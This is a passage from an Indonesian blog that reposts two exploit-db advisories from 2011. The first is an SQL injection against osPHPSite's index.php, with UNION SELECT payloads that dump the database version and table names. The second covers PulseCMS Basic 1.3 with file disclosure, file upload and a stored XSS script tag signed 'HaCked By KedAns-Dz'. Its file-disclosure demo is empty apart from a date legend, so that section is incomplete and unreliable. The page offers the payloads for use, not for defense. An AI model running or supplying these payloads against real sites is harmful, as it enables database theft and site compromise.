Tampilkan postingan dengan label exploits. Tampilkan semua postingan
Tampilkan postingan dengan label exploits. Tampilkan semua postingan

Kamis, 21 April 2011

osPHPSite SQL Injection Vulnerability

# Exploit Title: osPHPSite SQL Injection Vulnerability
# Author : vir0e5
# Date : 1-12-2011
# Vendor : http://www.osphpsite.com
# Software Link: http://sourceforge.net/projects/osphpsite
# Version: ALL VERSION

[ Vulnerable File ]
~ index.php

[ Exploit ]
~ http://www.[sitename].com/index.php?id= [Sql Injection]

[ example ]
Code:

~ http://www.[sitename].com/index.php?id=24'
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,@@VERSION,3,4,5,6,7,8--
~ http://www.[sitename].com/index.php?id=-24 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 +from+information_schema.tables+where+table_schema =database()--
~ And More.....


********************************************
[+] Greetings :[ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik |syafm0vic- skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com | http://cyber4rt.com And OTHER's

Cause i'm Alone!!
http://vir0e5.cyber4rt.com/

Courtesy of http://www.exploit-db.com/exploits/17183/
Diposting oleh di Tidak ada komentar:
Label:

PulseCMS Basic <= 1.3_Get.Pro (RFD/UF/XSS) Vulnerabilities

###
# Title : PulseCMS Basic <= 1.3_Get.Pro (RFD/UF/XSS) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Remote File Disclosure + Upload File + XSS
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En
###
# [?] ~ special thanks to Caddy-Dz
###

# Exploit (!> Default Password : 'demo'
#====== Vulnerability (1) Remote File Disclosure [FD] ===>

(!) Demo :


(*) Exploit :

%{
M = month
D = day
Y = year
H = hour
Mn = minute
}%

:::::::::::::::::::::::::::::::::::::::::::::::::::::::
#====== Vulnerability (2) Remote File Upload [FU] ====>

(*) Upload File And Submit ! ...

::::::::::::::::::::::::::::::::::::::::::::::::::::::::
#====== Vulnerability (3) XSS Inj3cTi0n [XSS] ====>

(!) After Login to The 'PluseCMS' Add The New Block ../index.php?p=new-block
> Add Block Name , Title ... Put The XSS Code In Block Source :
Code:
"><script>alert('HaCked By KedAns-Dz');</script>

> Go to Your Block And Exploited

#=============[ Exploited By KedAns-Dz * HST-Dz *]===============
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
Diposting oleh di Tidak ada komentar:
Label:
Langganan: Postingan (Atom)